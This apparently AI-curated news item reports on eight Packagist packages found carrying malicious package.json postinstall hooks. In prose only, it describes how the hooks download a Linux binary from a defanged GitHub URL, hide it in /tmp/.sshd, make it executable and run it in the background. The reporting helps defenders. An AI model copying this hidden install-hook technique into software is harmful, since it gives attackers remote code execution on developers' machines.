At a glance: Attackers exploit a cross-ecosystem vulnerability by abusing package.json lifecycle hooks that developers overlook when analyzing PHP dependencies.
Eight Composer packages on Packagist have been infected in a coordinated attack with malicious code that downloads a Linux binary from GitHub. The particularity: the malware code was embedded not in composer.json, but in package.json, targeting JavaScript build tools shipped alongside PHP code.
Analysis by Socket identified eight Packagist packages containing malicious code in their package.json files. The affected packages are: moritz-sauer-13/silverstripe-cms-theme (dev-master), crosiersource/crosierlib-base (dev-master), devdojo/wave (dev-main), devdojo/genesis (dev-main), katanaui/katana (dev-main), elitedevsquad/sidecar-laravel (3.x-dev), r2luna/brain (dev-main), and baskarcm/tzi-chat-ui (dev-main). The manipulated versions have since been removed from Packagist.
The attack pattern works via postinstall scripts in package.json: the code attempts to download a Linux binary from a GitHub releases URL (github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f), store it in the /tmp/.sshd directory, set execute permissions via chmod for all users, and run the binary in the background. Socket found this payload in 777 files on GitHub, indicating a broader campaign. In at least two cases, the code was also integrated into GitHub workflows, suggesting that the attackers deployed multiple execution mechanisms in parallel.
The nature of the downloaded malware remains unclear, as the GitHub account hosting the repository is no longer available. The malware name “gvfsd-network” is remarkable because it alludes to a GNOME Virtual File System daemon (GVfs) responsible for managing network shares. This could be a masking approach to conceal malicious activity.
Detectability for developer teams is limited: security teams scanning PHP dependencies typically focus on Composer metadata and overlook package.json lifecycle hooks within the same packages. The installer alone is critical enough to be blocked, as it enables remote code execution during installation or build workflows, disables TLS verification, suppresses errors, and executes a downloaded binary in the background.
Source: ainews-dev.lumi-systems.io · Published May 23, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.5.2.